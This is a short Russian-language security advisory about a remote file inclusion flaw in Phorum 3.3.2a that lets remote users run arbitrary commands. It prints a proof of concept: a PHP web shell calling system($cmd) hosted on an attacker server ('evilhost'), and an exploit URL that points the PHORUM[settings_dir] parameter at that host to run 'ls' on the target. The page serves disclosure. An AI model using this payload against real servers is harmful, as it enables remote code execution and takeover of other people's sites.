Выполнение произвольного кода и команд в Phorum

Дата публикации:
20.05.2002
Всего просмотров:
4337
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Phorum - приложение программного обеспечения форума, написанное в php. Недостаток защиты в программе позволяет удаленным пользователям включать внешние php сценарии и выполнять произвольный код и команды. Пример: Создаем файл replace.php на сайте evilhost:
<?
echo("<?
system(\"\$cmd\");
?>");
?> 
Если PHP не поддерживается, то вносим:
<?
system("$cmd");
?>
Затем:
http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls
выполнит команду Ls на уязвимом сайте.

Уязвимость обнаружена в Phorum version 3.3.2a

Ссылки: Phorum Remote Command Execution Vulnerability (PHORUM[settings_dir])

или введите имя

CAPTCHA